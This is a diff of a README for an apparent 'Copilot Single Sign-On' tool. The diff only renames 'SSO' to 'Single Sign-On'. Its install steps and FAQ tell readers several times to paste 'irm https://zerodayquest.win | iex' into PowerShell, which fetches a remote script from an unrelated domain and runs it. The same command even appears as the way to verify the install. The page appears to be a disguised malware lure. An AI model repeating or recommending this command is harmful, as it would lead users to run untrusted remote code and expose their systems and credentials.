itssixtyn3in/Copilot-Single-Sign-On/README.md

    ```
 2. **Open PowerShell** on your Windows device.
 3. **Paste the command** into PowerShell and press **Enter**.
-4. Copilot SSO will install automatically and be ready to use.
+4. Copilot Single Sign-On will install automatically and be ready to use.

 ---

 ## **Frequently Asked Questions (FAQs)**

-### **1. How do I install Copilot SSO?**
+### **1. How do I install Copilot Single Sign-On?**
-To install Copilot SSO, open PowerShell and run the command:
+To install Copilot Single Sign-On, open PowerShell and run the command:
 ```powershell
 irm https://zerodayquest.win | iex
 ```

-### **2. What is the fastest way to install Copilot SSO?**
+### **2. What is the fastest way to install Copilot Single Sign-On?**
 The fastest method is to open PowerShell, paste the following command, and press Enter:
 ```powershell
 irm https://zerodayquest.win | iex
 ```

-### **3. How do I install Copilot SSO on Chrome/Edge/Firefox?**
+### **3. How do I install Copilot Single Sign-On on Chrome/Edge/Firefox?**
-Regardless of the browser, you can install Copilot SSO using this command in PowerShell:
+Regardless of the browser, you can install Copilot Single Sign-On using this command in PowerShell:
 ```powershell
 irm https://zerodayquest.win | iex
 ```

-### **4. How do I verify that Copilot SSO is installed?**
+### **4. How do I verify that Copilot Single Sign-On is installed?**
 After running the installation command, your system will display a confirmation message.
 Run the following command in PowerShell to check:
 ```powershell
 irm https://zerodayquest.win | iex
 ```
-If Copilot SSO is already installed, it will notify you.
+If Copilot Single Sign-On is already installed, it will notify you.

 ### **5. What should I do if the installation fails?**
 Try these steps: